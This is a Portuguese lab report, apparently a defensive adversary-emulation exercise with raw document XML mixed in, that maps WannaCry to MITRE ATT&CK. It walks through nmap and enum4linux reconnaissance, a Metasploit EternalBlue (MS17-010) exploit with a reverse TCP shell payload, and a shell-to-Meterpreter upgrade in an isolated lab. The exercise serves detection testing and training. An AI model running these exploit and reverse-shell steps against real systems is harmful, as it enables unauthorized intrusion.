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9600" cy="76716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76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Sumário Executivo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WannaCry (WanaCrypt0r/WCry), detectado em maio de 2017, foi um ransomware de grande escala que explorou a vulnerabilidade SMB (MS17-010) para se propagar rapidamente.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Infectou centenas de milhares de máquinas em mais de 150 países, impactando serviços críticos como o NHS no Reino Unido.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incidente ressaltou falhas na gestão de patches, dependência de protocolos inseguros (SMBv1) e ausência de segmentação de rede, resultando em perdas operacionais, indisponibilidade e a necessidade urgente de revisar estratégias de backup e contingência.Mapeamento MITRE ATT&amp;CK (Resumo)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Inicial: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Exploração de serviço público (MS17-010 / T1190).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Execução local de payloads de ransomware (T1204 / T1486 context).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Persistência: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 campanhas relacionadas, uso de backdoors (ex.: DoublePulsar-like) ou modificações para manter presença (T1547 / T1098 analogs).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Escalação de Privilégios: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Exploração de vulnerabilidades de kernel/serviço que permitem execução remota (T1068).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Simulação das Táticas e Técnicas (Metodologia Segura)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simulação foi conduzida em um ambiente de laboratório isolado, utilizando frameworks de emulação e sem amostras reais do WannaCry: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TryHackMe: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Laboratórios focados em Windows, phishing e detecção (ex.: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Phishing Emails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 PrivEsc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Atomic Red Team / Caldera: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Emulação de técnicas MITRE para reproduzir telemetria (criação massiva de arquivos, tráfego SMB anômalo).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Máquinas Intencionalmente Vulneráveis (Metasploitable / VulnHub):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Utilizadas para exercícios de movimento lateral e escalonamento em redes isoladas.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Observação Importante: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uso de binários maliciosos reais foi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proibido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 todas as etapas.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Foram empregadas emulações comportamentais (scripts benignos e frameworks) para gerar a telemetria equivalente, essencial para a validação de detectores e playbooks de Resposta a Incidentes (IR).Detalhamento da Simulação por TáticaReconhecimento: Técnica, Laboratório e Adaptação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Técnica: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Simulada a exploração de sites e domínios abertos (T1593 Search Open Websites/Domains) para identificar alvos (inventário de serviços SMB expostos, versão do SO e nível de patch).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 Laboratório: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Captura de banners SMB, inventário de hosts e correlação com CMDB simulado.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Ferramentas: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Scans passivos, logs de Active Directory e análise de metadados, sempre em redes controladas.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Inicial: Técnica, Laboratório e Adaptação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Técnica Original (WannaCry):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Exploração do serviço SMB vulnerável (MS17-010).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Adaptação em Laboratório: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Emulação de exploração (Atomic Red Team / Caldera) para gerar sessão e tráfego SMB anômalo, sem execução de exploits reais.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Simulação de download/execução via e-mail ou compartilhamento infectado (arquivo benigno que cria telemetria similar).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Passos em Laboratório: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Criação de cenário com host vulnerável, emulação que gera eventos de ProcessCreate, NetworkConnection e FileWrite, e validação de alertas no SIEM.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Execução: Técnica, Laboratório e Adaptação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widowControl w:val="0"/>
        <w:spacing w:after="80" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_tvp5woey8o9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2.1 Reconhecimento</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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 AtlasLogística é uma empresa regional de transporte e armazenagem que atende fabricantes e varejistas de médio porte. Por anos, a operação crítica da Atlas funcionou sobre servidores Windows legados, com compartilhamentos de arquivos amplamente usados entre filiais e um inventário de ativos que nem sempre estava atualizado na CMDB. Preocupada com relatos recentes de ataques ransomware no setor, a diretoria decidiu contratar uma equipe de segurança externa para avaliar sua exposição — nasceu então o projeto </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Operação Escudo Azul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 equipe contratada, chamada </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Aegis Cyber</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, realizou a análise em um ambiente de laboratório controlado que simulava a rede da Atlas. No primeiro dia, a Aegis executou a fase de reconhecimento: varreduras Nmap na faixa 1–999 mostraram que um dos servidores chave respondia com </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">três portas abertas</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (135, 139 e 445), o que imediatamente chamou a atenção da equipe.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C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Figura 1 – Reconhecimento inicial: portas 135, 139 e 445 identificadas com Nmap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A presença do serviço SMB (porta 445) e as evidências coletadas durante a enumeração sugeriram risco de exploração pela vulnerabilidade </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MS17-010</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — justamente a falha que possibilitou a propagação do WannaCry em 2017.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020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Figura 2 – Scan Nmap confirmando host vulnerável a MS17-010 (EternalBlue)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Diante dessa constatação, a diretoria da Atlas autorizou a continuidade controlada dos testes (emulado, sem uso de malwares reais) para validar detectores, playbooks de resposta e medidas de mitigação. O exercício provou ser um alerta útil: além de mitigar a janela de exposição, gerou uma lista de ações priorizadas — patching imediato, desativação do SMBv1, segmentação de rede e testes de restauração de backup — que foram incorporadas ao plano de remediação da Atlas. Ao final, a empresa não só conheceu sua superfície de risco, mas saiu com procedimentos concretos para reduzir a probabilidade de um incidente similar no ambiente de produção.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024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complementar a descoberta de serviços, realizamos enumeração SMB com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enum4linux</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> para extrair nomes de usuários conhecidos, ranges de RIDs e informações de workgroup/domain. Esses dados ajudam a priorizar contas a serem testadas em fases posteriores (elevação de privilégio e movimento lateral) e a confirmar a natureza do alvo no laboratório — informações cruciais para um ator APT durante a fase de reconhecimento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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3 – Enumeração SMB com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enum4linux</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> mostrando Target Information (RIDs, known usernames) no host alvo.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widowControl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amp3wv4amud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Técnica, Laboratório e Adaptação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Técnicas MITRE ATT&amp;CK:</w:t>
        <w:br w:type="textWrapping"/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T1593 (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Search Open Websites/Domains</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) – pesquisa por ativos expostos.</w:t>
        <w:br w:type="textWrapping"/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T1046 (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Network Service Discovery</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) – descoberta de serviços em rede.</w:t>
        <w:br w:type="textWrapping"/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T1087 (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Account Discovery</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) – enumeração básica de contas/nomes em sistemas acessíveis.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002D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No mundo real, atores maliciosos podem usar scans em larga escala na internet ou consultar bases de leaks para descobrir alvos. No laboratório, adaptamos esse comportamento utilizando ferramentas seguras como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enum4linux</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> para mapear a rede da Atlas em um ambiente controlado.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widowControl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7lr6508plhl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Passos Executados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Descoberta de hosts ativos</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: simulamos a varredura inicial com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nmap -sn</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, identificando quais IPs estavam online.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Identificação de serviços</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: em seguida, um scan direcionado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nmap -p 1-999</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) revelou três portas abertas: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">135/tcp (MSRPC)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139/tcp (NetBIOS-SSN)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445/tcp (Microsoft-DS/SMB)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Enumeração SMB</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: com ferramentas como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enum4linux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smbclient</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, coletamos informações adicionais sobre shares e banners do serviço SMB.</w:t>
        <w:br w:type="textWrapping"/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Correlações de vulnerabilidade</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: a presença do SMB exposto levou a equipe a executar scripts NSE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smb-os-discovery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smb-vuln-ms17-010</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">), que sugeriram forte possibilidade de exploração via </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MS17-010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widowControl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xxz42j2dybs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Evidências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Figura 1 – Reconhecimento inicial: portas 135, 139 e 445 identificadas com Nmap.</w:t>
        <w:br w:type="textWrapping"/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Figura 2 – Scan Nmap confirmando host vulnerável a MS17-010 (EternalBlue).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Figura 3 – Enumeração SMB com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enum4linux</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> mostrando Target Information (RIDs, known usernames) no host alvo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000037">
      <w:pPr>
        <w:widowControl w:val="0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widowControl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16isf2ipm4r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Interpretação</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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Assim como um APT real faria, a equipe descobriu que o serviço SMB exposto representava a peça-chave para o acesso inicial. No caso da AtlasLogística, isso significava que, em um ambiente real sem patch adequado, o ransomware WannaCry teria terreno fértil para se propagar. Esse reconhecimento permitiu traçar a linha de ataque simulada que guiaria as próximas etapas.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widowControl w:val="0"/>
        <w:spacing w:after="80" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_dam1m4cz9uor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2.2  Obtendo Acesso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 a confirmação da superfície de ataque obtida no reconhecimento, a equipe Aegis Cyber avançou para a fase de acesso inicial. Atuando como um ator sofisticado, o objetivo foi validar de forma controlada se a falha MS17-010 permitiria a execução remota e o estabelecimento de uma sessão no host da AtlasLogística — tudo isso dentro do laboratório isolado e seguindo regras estritas de contenção e auditoria.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273550" cy="227279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27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Figura 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Tela do Metasploit exibindo módulos e alvos relacionados à exploração MS17-010 (EternalBlue).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validar a possibilidade de exploração de forma controlada, a equipe utilizou o Metasploit Framework como ferramenta de teste. Foi carregado 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exploit/windows/smb/ms17_010_eternalblue</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, os parâmetros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RHOSTS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LHOST</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> foram configurados para apontar, respectivamente, para a VM alvo (10.201.66.21) e a máquina de controle do laboratório, e foi selecionado um payload de teste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windows/x64/shell/reverse_tcp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) — tudo dentro da rede isolada do laboratório. Antes da execução foram criados snapshots das VMs e definidos limites operacionais (nenhuma ação de persistência ou movimento lateral); a execução teve como finalidade exclusiva gerar telemetria (ProcessCreate, conexões de rede e atividades de I/O) para validar detectores e playbooks de resposta.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Figura 5 – Opções do módulo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exploit/windows/smb/ms17_010_eternalblue</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> mostrando RHOSTS configurado e parâmetros do payload.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Ao executar o módulo com os parâmetros previamente validados, o exploit conseguiu corromper o buffer remoto e abrir uma sessão de comando no host alvo. A captura abaixo registra a sequência final da exploração e a mensagem que confirma a abertura do shell remoto na máquina da AtlasLogística.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34063" cy="201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6– Execução do exploit EternalBlue e obtenção de shell remoto (sessão 1 aberta).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sessão remota foi imediatamente colocada em segundo plano e a equipe preservou snapshots da VM alvo para análise forense. Em conformidade com as regras do laboratório, apenas ações de observação foram realizadas (execução de comandos não destrutivos e coleta de telemetria), visando validar a detecção por EDR/SIEM e testar os playbooks de resposta — não houve tentativa de escalonamento de persistência ou movimentação lateral em ambiente de produção.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widowControl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wjy9f8i61444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Técnica, Laboratório e Adaptação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Técnicas MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> T1190 (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit Public-Facing Application</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) / T1210 (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploitation of Remote Services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Contexto real vs laboratório:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Em um cenário real, atores explorariam EternalBlue (MS17-010) para obter uma execução remota sobre serviços SMB. Em laboratório, adaptamos essa ação para validação controlada: utilizamos o </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit Framework</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> para confirmar a viabilidade do vetor, mas substituímos qualquer payload destrutivo por </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">stubs</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ou payloads de teste que apenas geram telemetria (shell reverso benigno). Antes da execução foram criados snapshots e definidas regras operacionais estritas para reversibilidade e auditoria.</w:t>
        <w:br w:type="textWrapping"/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widowControl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3t78kv3ypmot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Passos Executados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Preparação do ambiente</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — criação de snapshots das VMs alvo e de controle; definição de limites (sem persistência, sem movimentação lateral fora do escopo).</w:t>
        <w:br w:type="textWrapping"/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Identificação do módulo público</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — pesquisa e inspeção no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msfconsole</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> do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exploit/windows/smb/ms17_010_eternalblue</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> e suas opções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show targets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show options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Configuração do exploit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — no Metasploit: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 exploit/windows/smb/ms17_010_eternalblue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set RHOSTS &lt;IP_alvo&gt;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set LHOST &lt;IP_controle&gt;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set PAYLOAD windows/x64/shell/reverse_tcp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 (ver Figura 4 — opções do módulo com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RHOSTS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> configurado).</w:t>
        <w:br w:type="textWrapping"/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Execução controlada</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — execução do exploit em VM isolada; quando a sessão foi aberta, o payload de teste forneceu um shell reverso restrito, suficiente para gerar eventos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ProcessCreate</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, conexões TCP e atividades de I/O monitoráveis.</w:t>
        <w:br w:type="textWrapping"/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Preservação de evidências</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — colocação do shell em segundo plano, snapshots pré/post e coleta de pcaps, logs do Metasploit e eventos Sysmon/Event Viewer.</w:t>
        <w:br w:type="textWrapping"/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widowControl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i7irkzba67on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Evidências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Figura 4</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Tela do Metasploit exibindo módulos/targets relacionados a MS17-010.</w:t>
        <w:br w:type="textWrapping"/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Figura 5</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Opções do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ms17_010_eternalblue</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> com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RHOSTS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> configurado.</w:t>
        <w:br w:type="textWrapping"/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Figura 6</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Execução do exploit e obtenção de shell remoto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Command shell session 1 opened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widowControl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th4rl4ajhdgo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Interpretação</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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obtenção de uma sessão remota, mesmo via payload de teste, confirmou a cadeia de ataque inferida durante o reconhecimento: SMB exposto + host sem patch → exploração viável via MS17-010. Essa confirmação técnica validou a prioridade de mitigação (patch imediato, desativar SMBv1 e isolar segmentos) e permitiu calibrar as regras de detecção do SIEM/EDR com sinais concretos (ProcessCreate associados a conexões SMB, shells reversos internos, I/O anômalo). Em termos APT, a etapa demonstrou como um atacante poderia rapidamente ganhar um foothold e, se não contido, ampliar o impacto por movimento lateral.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005A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widowControl w:val="0"/>
        <w:spacing w:after="80" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_crugxdnxhcx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2.3  Escalando Privilégio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Após ganhar um </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">foothold</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> com o shell reverso, a equipe </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Aegis Cyber</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> avançou para a fase de </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">escalonamento de privilégios</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. O objetivo foi elevar o contexto de execução para privilégios administrativos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) de forma controlada, apenas o necessário para gerar telemetria e validar detectores. Em um ataque real, essa etapa é crítica para permitir instalação de backdoors persistentes e movimento lateral; no laboratório, todas as ações foram executadas em VMs isoladas e reversíveis (snapshots pré/post), com proibição de persistência não autorizada e registro completo dos comandos e artefatos para auditoria forense.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002655" cy="14573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7 – Conversão de shell para Meterpreter: saída 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msfconsole</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> mostrando o módulo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post/multi/manage/shell_to_meterpreter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(ver Figura 8) A tela confirma os parâmetros obrigatórios (SESSION e LPORT) e indica que o handler deve estar ativo para receber a conexão do payload.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Figura 8 – Opções do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post/multi/manage/shell_to_meterpreter</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (HANDLER, LHOST, LPORT, SESSION).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Ao confirmar a obtenção da sessão remota, a equipe listou as sessões ativas no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msfconsole</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> para identificar o identificador (ID) da sessão a ser utilizada no módulo de pós-exploração. A saída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show sessions</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) exibiu </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Session 1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> como um </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shell x64/windows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conectado (conexão reversa do LHOST → RHOST). Esse ID foi utilizado no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post/multi/manage/shell_to_meterpreter</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (definindo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SESSION 1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) para proceder com a conversão controlada do shell em Meterpreter e executar ações de pós-exploração não destrutivas.</w:t>
      </w:r>
    </w:p>
